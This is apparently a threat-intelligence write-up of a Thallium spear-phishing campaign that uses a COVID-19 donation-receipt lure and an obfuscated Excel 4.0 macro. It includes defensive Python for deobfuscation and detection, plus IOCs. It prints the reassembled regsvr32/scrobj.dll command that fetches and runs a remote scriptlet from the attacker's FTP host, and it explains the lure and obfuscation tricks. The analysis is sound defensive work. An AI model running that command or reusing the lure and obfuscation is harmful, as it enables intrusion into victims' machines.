
Thallium Conducts Spear Phishing Attack Themed on the 2021 Corona19 Response

Introduction

Recently, a hacking attack attributed to Thallium was caught that posed as a document for issuing a donation receipt for the 2021 Corona 19 (COVID-19) response. Timed for the year-end tax settlement season, the attack was subtly disguised as an e-mail requesting a donation receipt from a specific private relief association in Korea.

The following is the e-mail screen used in the actual attack; other similar attacks are also in progress.


[Figure 1] Hacking e-mail disguised as being sent from a specific disaster relief association

A compressed file named ‘2021 Corona 19 Response_Donation Certificate.zip’ is attached to the e-mail.

The compressed file contains two files:

● Corona 19 Response in 2021_Donation Certificate.pdf

● Application for issuance of large donation receipts_form_individual.xlsb

The ‘2021 Corona 19 Response_Donation Certificate.pdf’ file contains the contents of a donation certificate, as follows.


[Figure 2] PDF document containing the contents of a normal donation certificate

When the ‘Application for issuance of large donation receipts_form_individual.xlsb’ file, an MS Excel Binary Worksheet (.xlsb), is opened, it shows a screen that looks like a protected file and induces the user to click the [Enable Content] button.


[Figure 3] Screen inducing macro execution

If the user enables content and macros are allowed to run, the following screen is displayed while, at the same time, the document connects to the attacker’s command and control (C2) server and performs additional actions.


[Figure 4] Actual document contents displayed after the macro runs

By showing a normal-looking document, it tricks the user into believing nothing is wrong and hides the fact that a malicious file has been opened. In the background, however, the computer connects to the FTP server specified by the attacker and attempts to execute additional commands.

※ [Command and control address]
-ftp://mufasa:simba@kvz.factorgpu[.]com:21/forbaby.png
(the FTP credentials are embedded in the URL; the user name and password are recovered from the obfuscated cells shown below, and the host is the one listed in the IOCs)

The actual ‘Application for issuance of large donation receipts_form_individual.xlsb’ file contains the following code in its internal macro sheet.


[Figure 5] Macrosheet internal code

Analysis of the commands in the Excel sheet shows that the first cell begins with an equal sign (=) so that Excel treats it as a formula (an Excel 4.0/XLM macro sheet rather than a VBA project), and that the server string is obfuscated by placing each character in a separate cell and concatenating the cell references at run time. Each cell read in isolation is meaningless, so static scanners that look for a URL or command string in the sheet see nothing.


[Figure 6] Cell-level obfuscation of the server address (each referenced cell holds one character)

D21 =:
A18 = f
4 = t
B29 = p
D21 =:
B15 = /
B15 = /
B4 = m
B25 = u
A18 = f
C10 = a
B12 = s
C10 = a
D21 =:
B12 = s
B20 = i
B4 = m
E1 = b
C10 = a
C19 = @
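The cell map above reads, in order, “:ftp://mufasa:simba@”, i.e. the scheme, user name and password of the FTP URL. The following is an added example (not code from the original analysis or from the malware) of how an analyst can resolve this kind of XLM concatenation without opening the file in Excel: a small evaluator that follows cell references recursively, handles quoted literals and the & operator, refuses circular references, and then extracts any URL from the resolved strings. The sheet it runs on is constructed to mirror Figure 6; the single-character cells are the ones listed on the page (the cell holding “t” is given there only as “4”, so A4 is an assumption), while the F-column formulas, the host kvz.factorgpu.com and the file name are my reconstruction from the analysis text, not a dump of the real sheet.

```python
import re
from typing import Dict, List

# Constructed macrosheet modelled on the cell map in Figure 6: each character of
# the server string sits in its own cell and formula cells glue them together
# with the & operator. The single-character cells are the ones the page lists
# (A4 holding "t" is an assumption; the page shows that cell only as "4"). The
# F-column formulas, the host and the file name are a reconstruction from the
# analysis text, not a dump of the real sheet.
CELLS: Dict[str, str] = {
    "D21": ":", "A18": "f", "A4": "t", "B29": "p", "B15": "/", "B4": "m",
    "B25": "u", "C10": "a", "B12": "s", "B20": "i", "E1": "b", "C19": "@",
    "F1": "=A18&A4&B29",                  # ftp
    "F2": "=F1&D21&B15&B15",              # ftp://
    "F3": "=B4&B25&A18&C10&B12&C10",      # mufasa
    "F4": "=B12&B20&B4&E1&C10",           # simba
    "F5": '=F2&F3&D21&F4&C19&"kvz.factorgpu.com/forbaby.png"',
    "F6": '="regsvr32 /u /n /s /i"&D21&F5&" scrobj.dll"',
}

# Formula tokens understood here: "string literal" (a doubled quote escapes a
# quote), a cell reference such as B15 or $B$15, the & operator, and whitespace.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|\$?([A-Z]{1,3})\$?(\d+)|&|\s+')
URL = re.compile(r'(?:https?|ftp)://[^\s"\']+', re.I)


def evaluate(cells: Dict[str, str], ref: str, stack: frozenset = frozenset()) -> str:
    """Resolve a cell to its final string, following references recursively."""
    if ref in stack:
        raise ValueError(f"circular reference through {ref}")
    raw = cells.get(ref, "")
    if not raw.startswith("="):
        return raw                      # a constant cell, returned verbatim
    stack = stack | {ref}
    expr, pos, parts = raw[1:], 0, []
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f"unsupported syntax in {ref} at offset {pos}: {expr[pos:]!r}")
        pos = m.end()
        if m.group(1) is not None:                        # quoted literal
            parts.append(m.group(1).replace('""', '"'))
        elif m.group(2):                                  # cell reference
            parts.append(evaluate(cells, f"{m.group(2)}{m.group(3)}", stack))
        # '&' and whitespace contribute nothing to the result
    return "".join(parts)


def find_urls(cells: Dict[str, str]) -> List[str]:
    """Evaluate every cell and return the distinct URLs that appear, in sheet order."""
    seen: List[str] = []
    for ref in cells:
        for url in URL.findall(evaluate(cells, ref)):
            if url not in seen:
                seen.append(url)
    return seen


if __name__ == "__main__":
    for ref in ("F5", "F6"):
        print(f"{ref} -> {evaluate(CELLS, ref)}")
    print("URLs:", find_urls(CELLS))
```

The evaluator deliberately covers only concatenation; real XLM droppers also use CHAR(), MID() and FORMULA() to build strings, and a full emulator is needed for those. The point here is that the obfuscation in this sample is purely structural, so resolving the references is enough to recover the C2 string.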

When all the obfuscated strings are reassembled, the macro runs regsvr32.exe with the Script Component Runtime (scrobj.dll) as its argument, which makes regsvr32 fetch a scriptlet from the attacker’s FTP server and execute it:

regsvr32 /u /n /s /i:ftp://mufasa:simba@kvz.factorgpu[.]com/forbaby.png scrobj.dll

With this routine, an arbitrary malicious script hosted at the URL (FTP) address can be executed, and further attacks are possible at any time depending on the attacker’s intent. Here /s suppresses dialog boxes, /n skips the DllRegisterServer call, and /i passes the URL to scrobj.dll, which downloads and runs the scriptlet; the .png extension is cosmetic. Because regsvr32.exe is a Microsoft-signed system binary, this technique (MITRE ATT&CK T1218.010, often called “Squiblydoo”) can slip past application-control policies that trust signed Windows binaries, so detection has to look at the command line and the parent process rather than at the image being executed.
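Detection logic for this behaviour, added here as an example and not part of the original analysis: it scans process-creation events for regsvr32 invocations that hand a /i: argument to scrobj.dll, records whether the scriptlet is fetched over HTTP/HTTPS/FTP or read from disk, and raises the severity when the parent is an Office application, which is exactly the shape of this attack. The events are constructed in a simplified “timestamp|Image|ParentImage|CommandLine” layout: the first line reproduces the command from the analysis above, while the other three (including the 203.0.113.7 address, a documentation range) are made up to exercise a benign regsvr32 call, a differently cased variant with dash switches, and a local scriptlet.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation events in a simplified pipe-delimited layout.
# Line 1 is the command line from the analysis; the rest are invented so the
# rule is tested against a benign registration, a cased/dashed variant and a
# local scriptlet. 203.0.113.7 is a documentation address.
SAMPLE_EVENTS = r"""
2021-01-27 09:14:02|C:\Windows\System32\regsvr32.exe|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|regsvr32 /u /n /s /i:ftp://mufasa:simba@kvz.factorgpu.com/forbaby.png scrobj.dll
2021-01-27 09:20:11|C:\Windows\System32\regsvr32.exe|C:\Windows\System32\msiexec.exe|regsvr32 /s "C:\Program Files\Vendor\control.ocx"
2021-01-27 09:22:45|C:\Windows\SysWOW64\regsvr32.exe|C:\Windows\explorer.exe|REGSVR32.EXE -n -s -i:"http://203.0.113.7/update.sct" SCROBJ.DLL
2021-01-27 09:30:00|C:\Windows\System32\regsvr32.exe|C:\Windows\System32\cmd.exe|regsvr32 /s /i:"C:\Users\Public\a.sct" scrobj.dll
""".strip()

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# regsvr32 with or without a path or .exe, in any case
REGSVR32 = re.compile(r'(?:^|[\\\s"])regsvr32(?:\.exe)?(?:["\s]|$)', re.I)
# /i:<target> or -i:<target>; the target may be quoted and may be a URL or a path
INSTALL_ARG = re.compile(r'[/-]i:\s*"?([^"\s]+)"?', re.I)
REMOTE = re.compile(r'^(?:https?|ftp)://', re.I)


@dataclass
class Finding:
    timestamp: str
    parent: str          # parent image file name, lower-cased
    scriptlet: str       # the /i: argument handed to scrobj.dll
    remote: bool         # fetched over HTTP/HTTPS/FTP rather than read from disk
    office_parent: bool  # spawned by an Office application (document-borne)


def inspect(cmdline: str) -> Optional[str]:
    """Return the /i: target if cmdline is a regsvr32 + scrobj.dll scriptlet load, else None."""
    if not REGSVR32.search(cmdline) or "scrobj.dll" not in cmdline.lower():
        return None
    m = INSTALL_ARG.search(cmdline)
    return m.group(1) if m else None


def scan(events: str) -> List[Finding]:
    """Run the rule over pipe-delimited events and return one Finding per hit."""
    findings: List[Finding] = []
    for line in events.splitlines():
        if not line.strip():
            continue
        ts, _image, parent, cmdline = line.split("|", 3)
        target = inspect(cmdline)
        if target is None:
            continue
        parent_name = parent.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        findings.append(Finding(ts, parent_name, target,
                                bool(REMOTE.match(target)),
                                parent_name in OFFICE_APPS))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        sev = "HIGH" if f.office_parent or f.remote else "MEDIUM"
        print(f"[{sev}] {f.timestamp} parent={f.parent} scriptlet={f.scriptlet} remote={f.remote}")
```

The rule keys on the combination of scrobj.dll and a /i: argument rather than on the URL, so it is not tied to this actor’s infrastructure; the IOCs at the end of this post are what you would add for retrospective matching. Legitimate software almost never loads scrobj.dll through regsvr32 /i:, so the local-path hit is still worth a look even though it lacks the network indicator.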

While investigating this threat case, ESRC researchers confirmed that it is highly similar to the case reported on Jan. 03, ‘Thallium organization exploits private stock investment messenger to conduct software supply chain attack’.

The malicious document files discovered at that time share Tactics, Techniques, and Procedures (TTPs) with this case, and the ‘last modified by’ account of the malicious document files is the same, ‘Asus’.


In addition, the Passive DNS IP address (23.106.160.32) used by the C2 servers in both cases matches exactly:

● Investigation of users of illegally used phone number suspension system (UNMS)_form.xlsb (search.greenulz[.]com / 23.106.160.32)

● Application for issuance of large donation receipts_form_individual.xlsb (kvz.factorgpu[.]com / 23.106.160.32)

In Korea, the Thallium group is currently classified as the most active threat actor and is conducting a wide range of attacks targeting various sectors.

IOCs

search.greenulz.com

kvz.factorgpu.com

23.106.160.32

23.106.160.32